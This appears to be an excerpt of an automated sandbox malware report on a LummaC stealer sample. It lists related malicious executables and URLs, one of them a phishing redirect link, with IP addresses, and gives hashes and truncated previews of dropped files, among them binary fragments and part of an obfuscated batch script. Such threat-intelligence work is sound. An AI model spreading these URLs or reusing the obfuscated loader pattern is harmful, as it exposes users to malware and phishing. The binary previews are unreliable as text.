                                                          http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfhGet hashmaliciousUnknownBrowse
                                                          • 104.26.9.163
                                                          http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.87.112
                                                          test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 104.21.34.5
                                                          iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.66.86
                                                          SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.2.51
                                                          oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.66.86
                                                          MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.157.254
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          a0e9f5d64349fb13191bc781f81f42e1Set-up.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.37.209
                                                          • 104.26.3.16
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comSgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                            TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                                                              j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                  vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                      BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                          SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                            !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):947288
                                                                              Entropy (8bit):6.630612696399572
                                                                              Encrypted:false
                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse
                                                                              • Filename: TNyOrM6mIM.exe, Detection: malicious, Browse
                                                                              • Filename: j2nLC29vCy.exe, Detection: malicious, Browse
                                                                              • Filename: es5qBEFupj.exe, Detection: malicious, Browse
                                                                              • Filename: vUcZzNWkKc.exe, Detection: malicious, Browse
                                                                              • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                                              • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                                              • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                              • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                                              • Filename: !Setup.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):496248
                                                                              Entropy (8bit):7.999666539358623
                                                                              Encrypted:true
                                                                              SSDEEP:12288:PuuYPnblMBGjgrSn6caD4u0H2LKwAacxs8C4A9a44PknfCt9xK:GzPOt1caHq2SxVq94Pkf8K
                                                                              MD5:11A18CA5A4EC415EE2E991A8A2EFA60A
                                                                              SHA1:AD7F7F4763644158A7D1DC22A25D7FA3600AC91F
                                                                              SHA-256:44A0272003274F673664E9EAC14FAE1BFC04DEBE7CB58A86A75E7C8D08033F20
                                                                              SHA-512:EF4C89749A69680DD5476AADAB0F0A56F5530B0EDA13CB5C432BF608084F48D6968586AD8DB954A860A55C973C466E1DDE3157CEDD49BD47044368DEC750E2C6
                                                                              Malicious:false
                                                                              Preview:.az$Q..brYk..c\..5.1..#.h...;.o..*.L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P...*.`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y*......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I.*.\.1..u..*.......%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...|...0fg3..v.oX...^..%Tv...@}V.....|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........|..$....(..Q....y......0!l.j...V.Q....:..\*+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):63488
                                                                              Entropy (8bit):7.997218193561625
                                                                              Encrypted:true
                                                                              SSDEEP:1536:Bw4nxRC6h9dFUbZ+MsTogIPlC8aeu67NoURZDNMcI:HnxRpEbdWoxs8puuCaZD0
                                                                              MD5:CFCFA68F88E27612AB83EA57018A850C
                                                                              SHA1:B403391DD50F8F6DD090E7E0319B611D9BBD2874
                                                                              SHA-256:C6A15A8FA80F99E5F34775677B74082A0946FCF2F10AD3827691059821F034F7
                                                                              SHA-512:3B361BAF0F93B2F956BAB4EDB48E03A2AB06F2B61583E2A0D023B25C5D5E41A14074E2B7D007672CB63A8E44F25763649C847F338119B9E5FF203ED27AE98248
                                                                              Malicious:false
                                                                              Preview:..l?.G..d.SB.....E..v.Z._..d$t......'F..G8e...m..Ol.(.L~3[.....n..N...x.(;..W...t.........|..(a.>2.Y........,.C6..L..i&FN...%w%_.s.A....^.4..^..:a../..D>.. .`..#.......#N.,%A..-.{..&.......\v...??.b.f.EGf...$};r.o d@.6[....i...n6.k~.}O....KL.I[.=...H.tijY.I.`/...:j.j.7.....{.7.....@WQ......:....|..... ....L.....~-^.M..(......_hcwW...r.......E.U*(...e.&.H.....7..*.a{Y...U+|^.zH..1p..G.w...i]...6}...8.eB.E..x.O..K<........J;K"D.^..cA........n...4..,..tC..1...Q.e.D.9.........k...H...&FeT..5Xd.p..".0..u.?....2t.%../. ..'A$.1...`....S(..P.>.....-...-7...<.*..2.7;.GyJy..K...L..0.j._b...-iv..Px<5y4(.DEt....u!.b>.)......%G{..}.~...lZ...a....e.nb.... w..nZ.4..NB.g."..`..Z.<)..Y..s..._.&..no. ..f4>.'....XO...QKo#&...'......%..Y.;.&....d.S'..'..#.5b.....Q..q.~.7.O.]...Ynk...>..X.[.P..J....g.....f..n.t.z...R.......9ZD.T....,..V.K.w....A.}1...t....c.8W..8.CC-....r....}....Nd.]7.2..v......... /...ZP.STM;..aT[...^....gP%.aE.h..'.=&.)u..&.=...3.hjq
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):71680
                                                                              Entropy (8bit):7.9976781651176445
                                                                              Encrypted:true
                                                                              SSDEEP:1536:cqVGA8XmJWQDjDhD3rvvbIRdb5gOY4kb+HUjnhM//6AiaPynUZTPb2RZU:c+X8XCdDjVD37v0RwOY4kiWnhM36iPSy
                                                                              MD5:32795C14E61648316037781CC1BA12C5
                                                                              SHA1:4CA7E78E840E12EE1EC390C3996E1C75EFC5A248
                                                                              SHA-256:9E938A13061086921E0961EF7D2F0A89A6B2B33E9D21A1EEC0198D878DF4E536
                                                                              SHA-512:3A526AE9C35EE67F5AE951CEB927B8B2CE61EA4B03BEB5ECB941353CE6343A007857160DB689587EC34F712E7C9BC06918454DE73E3792F1F75CB671174BA35E
                                                                              Malicious:false
                                                                              Preview:l[u.....W.r:3..T...N_.......1..e.O..M....u..Pp.^>...1:.gJC.=...g..C..C.@Y"w)0..aCq.dO.K.h.X4:....r...q......}.{o...p.....n..Z0.d#1.[.........P.n.1.\!W.....;.%.fz9j.2E....6{....G...'X.......=....a.\..t....C.i>=..,...<@\$....[=Qp.c...6._.e......K.......hCS......1..J.q4.MJC...K..-P.LN.C..(.[o......t:G.....S.!...^B..P.=.u_..".oim..'a^X..FYjq..)......'...W"...h...^..XvE.g...C.....W..`.>.......P#..o-m[..}M......g..g..B.-.wS..M)s.....a..(..R..!.06.|N0...P.p.d.iP..0....g.J.B%e.)......d.d...~....2.......k.....J4H?........]..].G.y.WS!......3..)yw...|...T.-..&.q....?..OKk9"......Q@.qN..ZP...h.}..=... ...K.c.7.2Q.@.a....'...24.p.. ....m.T....."..L.{v..A. ....Z..@...G.....S......B.|.._4....Y.O.I..+/..^w.{.%..`.?......P..e......~.S....*.....{,..EQ..yA...-~...E.U^.($!"..!g...r.>....k...&..:T..._..~..Y.TQ.k'..$...g.W."~..qZ....T3...`...e..._...E.J%.'...T../&.2.L..WU........ I..]........l.......5.N0....g_...7.l.0..#...1...\.Z.k%th_.;.Y.....77..&.M...x..
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):56320
                                                                              Entropy (8bit):6.652049318870944
                                                                              Encrypted:false
                                                                              SSDEEP:1536:QUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoU:Xnj0nEoXnmowS2u5hVOoU
                                                                              MD5:64ACFD91F0FC989008A694B9F199A57B
                                                                              SHA1:8E4E37288AC01A2F48FDF059A0CFC5135C935C17
                                                                              SHA-256:6B0C1BB5546B6682CCE559D06DCA34D43A5208C30CEB0DCC18014E45F844E4B8
                                                                              SHA-512:02ADE9009A4D732A82E3708374A4CD80319DD6F19AF67841D8246EA7BDD7BA6BEFDE911B9DA8BE9AC9929D12DE4EB8ED69AC965FC795293449E4545281A7F30D
                                                                              Malicious:false
                                                                              Preview:.....#....u..=L.I...M.Q.Q...B.M......Y........9].].tE.E..t>3...t8.E.PV.u.....I..........M...A.PQj.j.S..x.I.........F;u.r..u...p.Vj...t.I.P..p.I....}.........u..G.f.w.P.u...L.I.P..P.I...tl.u..e......F....F..G....G...G.PWj.j.S..x.I...t=.E....@.E....r.u.j.Sj.V..|.I...t.V.E.P.u.....I...t..E.....].u..}...=x.I.t..u.j...t.I.P...t.Vj...t.I.P...t.Sj...t.I.P..E..t.Pj...t.I.P..E._^[....U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].U..E.SV.u...WVj..0j.S..d.I.....u6..0.I...zu).6j...t.I.P..p.I..M.....t.V.6Pj.S..d.I....._^...[].SVW..3.j.[._..w......G.3..........Q....Y..9w.v......P.M....F;w.r.._^[...V..~..t.3.PPP.v.P.v...0.I.j..v......YY.v...`.I..6.B...Y^.U..QSV.u....M...WVj..1.E.SP....I.....u7..0.I...zu*.6j...t.I.P..p.I..M.....t.V.6PS.u.....I....._^...[..SVW...Sj.3...t.I.P..p.I.....t.j.SP..,.I....._^...[.U..VW.u...3.j...t.I.P..p.I.....t.j.P..(.I....._...^].U....SQQ.M......M.......t..z.....t.....2.M........[..U...dSVWQQ.M..`...Q.
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):143360
                                                                              Entropy (8bit):6.659217298088009
                                                                              Encrypted:false
                                                                              SSDEEP:3072:h0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNP:IbfSCOMVIPPL/sZ7HS3zcNP
                                                                              MD5:89B5A26508E16E2564552AE664E91B66
                                                                              SHA1:9851FFCBE0015AA2210070E84D7058EA73EC84E4
                                                                              SHA-256:EAAF46C77B4F4F937A620D807D58D60882A0310978DBFFC32D469CB025DD45E1
                                                                              SHA-512:B5D1CCCC6C632D0138AAE3A6058BEBDDE6811F5CFCA986E36E790F690C7630E7B257E8C6680CE0A7A6A52D3C18CF395634BE5A96B66BE46C9A6A55BB1D35EF91
                                                                              Malicious:false
                                                                              Preview:..1...Y..x.=....s.... GJ.].3.]..U..U.V..u.....j.^.0.C.........}..v.M......~.....3.@9E.w..l...j"..u...t.S.Z...W.~...0..~.....t.G...0..@I....Z......x..?5|.....0H.89t....:1u..F.....q...A..u.+.A.PSR.EB....._3.[^]..V..V..,.......Y<.u..F....V.R,..Y.F....^..U...d......L.3.E.S.]...l...VW.}..................u.3...........-u...............3.._....}.u"..........u.......h.gJ..`........E.P.\X..Y..t........A.....................................z....E.........|....@.}..u..E........................%.......u...3...2.....3.................3............@...............+..QQ..$....YY..:........=....t.=....u.3.........0...3....4......C..,..................j.^...............;.......3.......;..0...............u.....3........j Y+......3....@..............6.........H...............t.A..3.j X+..V.9................s...........su...t.....2.................jrY;.r..........................0.........+.........;.rm;.s..8..3..F.;.s........@...3.#.....#.........................
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64512
                                                                              Entropy (8bit):7.997169431224249
                                                                              Encrypted:true
                                                                              SSDEEP:1536:oSpmDzqM+54CRjeXU/4xbDjuNUAZy5NH+VOxI4+sdW1g:oSazq54CGUYbD6NXM5NegS45ig
                                                                              MD5:464B43F4D2DF8DF1A0D420A378B13284
                                                                              SHA1:0C90A0656812B3EF827D920195C5C36841AE17AE
                                                                              SHA-256:F0E44F93299CCE792814297DC2A34082B057FFCFBD7320C32B16598367A115E8
                                                                              SHA-512:2D07B7C972873D397A9E4A16478C73C864F9C82D86D8EE8EE820BDED709CA3EE6B2C1E709DB52B01A131ED0BFF4881BC922D0BCFDEA512EE02D8A0513E7F1E26
                                                                              Malicious:false
                                                                              Preview:.az$Q..brYk..c\..5.1..#.h...;.o..*.L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P...*.`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y*......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I.*.\.1..u..*.......%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...|...0fg3..v.oX...^..%Tv...@}V.....|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........|..$....(..Q....y......0!l.j...V.Q....:..\*+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:ASCII text, with very long lines (1359), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):22954
                                                                              Entropy (8bit):5.07401746558717
                                                                              Encrypted:false
                                                                              SSDEEP:384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
                                                                              MD5:2E7B0022580A56F4A6645D751E977BC1
                                                                              SHA1:5F9942E6359BFEA8EA1407F69DFED3C308551238
                                                                              SHA-256:3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
                                                                              SHA-512:8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
                                                                              Malicious:false
                                                                              Preview:Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with very long lines (1359), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):22954
                                                                              Entropy (8bit):5.07401746558717
                                                                              Encrypted:false
                                                                              SSDEEP:384:aGf05c6NMXKObw2tlbZqfiqViJYS94QBvO51PKmPb3i32jRsHEWF4Yh:aMpKObhl1qKm0p9rPmG2KFV
                                                                              MD5:2E7B0022580A56F4A6645D751E977BC1
                                                                              SHA1:5F9942E6359BFEA8EA1407F69DFED3C308551238
                                                                              SHA-256:3D616D0119732BF2780AF373845A9F8F1C50AED7CEA51D54E0E790FFEC75280E
                                                                              SHA-512:8887FE072570E5EDF9987F4FA01B115322D0BE0F7D3265911C91CF3DECC8370DF79BC5E09F5AA30E749A8299B313C1C3B4F7F79647C82D55B218D7171961CDAE
                                                                              Malicious:false
                                                                              Preview:Set Korean=c..ufDetermined-Capabilities-Mechanics-Tim-Cruise-..qcVTopless-Clinical-Erp-Handled-Barn-Tub-..pqEaster-Convenience-..LjlvAdventures-Competitors-Unions-Sl-..vLAccording-Ben-Lean-Avg-Lyric-Completely-Urls-..QCTrap-Simulation-Download-Intelligent-Upgrades-Bunny-Bond-Citizen-..oRAlerts-Came-Necessity-Grateful-Raises-Opponents-Belgium-..TJsVPlaced-Unusual-Personals-Blind-Disks-Urban-Terrible-Precious-Funding-..Set Combined=G..ekvLDescriptions-Cet-Continent-House-Booty-..LMfgTit-Therapeutic-Airline-William-Fiscal-..vzSgReceipt-Ho-..tLCattle-Receipt-Appearance-Retention-Involve-Breeds-Fragrances-Bookings-Al-..YAmvStuck-..Set Laura=t..GUxGc-Recruiting-Switch-Impact-Briefs-Sticks-Radius-Selection-..PZpCombinations-Cialis-Allocation-Camera-Periods-Wt-Words-..xCyRequested-Harmony-Reasonably-Supply-Boy-Political-Lucia-..oseTGray-..BeeFEva-..fJFarmer-Vp-Toilet-Hair-Complications-Writes-Compete-..IabZFlooring-Brussels-Indonesian-Deluxe-Millennium-Spending-Bradford-Child-Beds-..pbFavourit
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):59392
                                                                              Entropy (8bit):7.996488555959393
                                                                              Encrypted:true
                                                                              SSDEEP:768:tJd3kcvzRbRlQP1WfW3xYgUdShSaLH4MyeoZGZkM1jufMxT6dZrdJ3:XRPq1WfoJ0abByT2ksjKQT6dZrdV
                                                                              MD5:7D627757A86D54CD1B6C057A7DBFCF26
                                                                              SHA1:3A73D88A63ED284DDD76305A4D91DEB9275C4C39
                                                                              SHA-256:3AAF7017767A1A1FBB1D9A80FA2C5B3C05583D879BE0A0E2F32898076A4D3BA7
                                                                              SHA-512:4B43BAB09367F06C762E2BC60ED3452E05C7001B83198C6732BB68C146DECBE6C837891F597092DFE00565B895933ED94EB665AAC6A1CD4A49E9E26EED65986F
                                                                              Malicious:false
                                                                              Preview:..Y.Jj.8\.. K2..%....f.OP_.3.Yl..d.[....._............L..x..7a5oc@.3..UX=.v. ....R.v.......x..........\.A.)U@...T.l...l..>...n../V.(L...q?.Q".4.6|D...I.\.yL..i.q...h....!..,..?p.....yR.... ..&.b..g..L..IpC..u.."....9..=.-|...B1.).$...6.H'....?_7.*..dkQ.W......1....mps..Vp.D4U.T.....c.B.bH[!.\...!..!}.o.d..l3).......t....W.qc.I..(v....o.b.._r.k#,..).....B@K%.x......hL..w.~....Oo..U5...'...I.@...Qm.......$..I......A..Z.j#..h>6T....cX.`qUB8..<2......Zq1....TG....Fh.=T)).~....]J.......A.G.w}W.&T9..Z@.~.....G.$..........g8........q.p........>..P.....Tv@...g..53.........@...z........|.C&;...S...e.G\u.F..w.fB|.@;O.....6....A...f......+....P.-..i..ey..bi...c`zV..0.......qo*!.q..i..{AU...5..l.`..G.?>r8:..]..R&..,.ZR3F..0.....C}...\...R........t..Oc...V....'`.n8......h.X.`.D..AU..E.P...tP.....&?.e./I.Q....M~.....{K..PD%.u..M]l.;w.....j...W.22..0.n..rl..v.T.....#.m....{...o8..}.D1...a.......2..5..V.)r.v'wl..F...k..@)..u...m....d..$.....qV8.hg..
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):79872
                                                                              Entropy (8bit):6.679021710164866
                                                                              Encrypted:false
                                                                              SSDEEP:1536:S64qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CxiL:J4qv+32eOyKODOSpQSAU4CI
                                                                              MD5:7D1725A7C164AD387FBA5007E60E47A7
                                                                              SHA1:C4253D862DFDBDB7EAE80F88E5487487E72C9AD4
                                                                              SHA-256:03CDD5BDCB6EBCB6CFDB7D5C3A038C1BEACA34FC9C8FBB717BC85F31BBDB797A
                                                                              SHA-512:7368DF3D1AF7DE8CA3074ABCE8AB02C6DCD309F9B6818C6ACD4AEBB72985B64253AC66A74E424FDC317CF1B07108616C4636826393707109E2377B4586BEA4DE
                                                                              Malicious:false
                                                                              Preview:8M.........]..U...,......L.3.E..M.3.SVW8A..}..........H......................y.3.G...;.r......W..........+.+...............3.......3.......3..,...............;.u....k..............7.................3.3....;...0..........0......F..;.u.......,.....tL..ss....0.....,...@..,....1...............,....j.P..0...h....P.("....,..........................3..t.3....0.....B....,.........;.u..tZ..ss....0.....,...C........,....?...............,....j.P..0...h....P.!....,..........................3.3............k....AG............;.................3.j.Y.......................&v.j&X....N!J...4.O!J............W..1............j.P.t.......P..........L!J....H.J.P........P.o_........3.A...;...............u.3.........,...P..........;.u.........t.3.3......0........0......G..;.u..tO..,.....ss....0.....,...C..,....43............SP..0.....,...h....P.. ...../.....,......+...;.........0..........,......P......P..0...SP........3...u.P........,.........PS.......,...@......;...............3.3......
                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):119808
                                                                              Entropy (8bit):6.588797342871174
                                                                              Encrypted:false
                                                                              SSDEEP:3072:N7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOm:56AUkB0CThp6vmVnjphfhnS
                                                                              MD5:CE605A59DE6379BA8DFAB762376A82DB
                                                                              SHA1:0E8D74F537E58AD09E08FB0AF0C2151FD91B953C
                                                                              SHA-256:81B6C9D8C798EEB2254ADE6E6A562C55F150198F97B25E550E4740594B679499
                                                                              SHA-512:1DBC8184FFC8B5B90F6DEB2BF002364AECDDD779079A349EA875C73AC14BB63A482E23B7E2D201251CFF220081C0D1D069C826E638E9DA0EACCEEC723B867888
                                                                              Malicious:false
                                                                              Preview:....t.3.PPPhLyL...3.f9.t-3.WWW.u....u.WWW..t.hhyL...WWWhLyL...h.yL...M......_^[..U....SV..M.W.^.S....3...t1W...lq...O..M.f.8.t.W...Xq...M....P......M...;.r.E.;.t.P.......M..f..._^[..U..QQVW3...WWj.V....I..E.Ph....j.WWj.V..X.I...u+.E.PV..h.I..u.Wh........I...WV....I.V..`.I._^..U..SVW..3.3.9W.v3.]....3.f..t......P.E....f9E.t.A...Kf..u....BF;w.r..._^[].......U..QSVW.....tW...u.W....Y.p.3.PPVWj.P....I....t33..j.Z;.|............Q.D...YSPVWj.j..E.....I..E...3._^[..U...(SVWj..M..}.Y.. K....j0Xjxf..}.f..Xf.C..W...x1.}..r..4....:...........f.DE.f.F.f.DM.f...v.y.}.3.f.D.._^[..U....SV..3.W.}...U.C..7.w....wA3.u.A.M...~0.u......QRP.*.....M..W.F.E..U.........E..M.;.|....2._^[..U....S.].VW....W..P.I.f.>...Y...V.|V..Y.....I....}........j..E.VP.....3.f.E..E.P.o...4^f.....V.>V........rhj..E.VP....3.f.E..E.P.o..f.G...]......V..V........r2j..E.VP.|...3.f.E..E.P.So.....f.G.V..U.......t..4^V..U..Y.........j..E.VP.:...3.f.E..E.P..o...4^f.G......]....V.U........rWj..E.VP.....3.f.E..
                                                                              Process:C:\Users\user\Desktop\!Setup.exe
                                                                              File Type:Microsoft Cabinet archive data, 488845 bytes, 11 files, at 0x2c +A "Fwd" +A "Designed", ID 6536, number 1, 29 datablocks, 0x1 compression
                                                                              Category:dropped
                                                                              Size (bytes):488845
                                                                              Entropy (8bit):7.998691987840986
                                                                              Encrypted:true
                                                                              SSDEEP:12288:XwvCK7QeZkkSjho8hd9kv+25MbW92VDfG4448L29:XEyBW8Nkv35MSYVTxPwA
                                                                              MD5:AFA0F6F9328F080270E89AFFF0581506
                                                                              SHA1:1C607C64FCA1CDB4E75DBFF2788F7C3B09D21EA6
                                                                              SHA-256:40E274B995FF6326EB0F89943CF999743AE9BDA9F314B3D775F62EC71A5F51C2
                                                                              SHA-512:1BE681C4CBA19297FA8D4C7339BD6C7F9E76098AFAC72B9283739DEC20B1A1F1444C71AD94BD29654E20E2CB788189969357CF9FF4284EBCB2A5958BCF166274
                                                                              Malicious:false
                                                                              Preview:MSCF.....u......,...................(..................Y(. .Fwd..8.........Y(. .Designed..0.........Y(. .Balanced............Y(. .Dir............Y(. .Writing............Y(. .Rise..4.........Y(. .Soccer......,.....Y(. .Returning.....]0.....Y(. .Available.....]......Y(. .Ford.....]......Y(. .Race..h...T..CK..\TU..~...U..`TX.c.j-9Z.h.2....2#)...4...$m".Q..Q{...2.]..u.M..@\.r..-.+.l.C....h..>.s..}.......=....9.<..u.sF......$. U=p].$.oMRYK.j..Kq....TU...0.......L8J..b......C);.lER1..1..........F...B....H..%4...j....!.o0a..p...c7&,...3f.....d{.S..Z.{......(Z...H.#.1.._.0g.s.3.`.^mp..1.RY.......d^.&~.(I.U.L.'...PRL..!i...Y."J....$..$..&..q#%.k..x.,...>|......H..T..E........}z.W...&.~.$.......;y..Ez.KR..2....T...-9._.....T.M^m.bR7R..._..n>...xa.$...'.$aU1..y.....@..,.....?m....*...zdA&.....uV.Ka.4..`>...{I.!.d......[M.7..r.k>s..k.s-f.......$.....A;l_=..}.%...R|l..p.@.......U.Y..)xZ..Ru{...?....G.>...`.VR.......AX.!D.z..CX.6.....g)|..(|.........C8z....vA..[.....
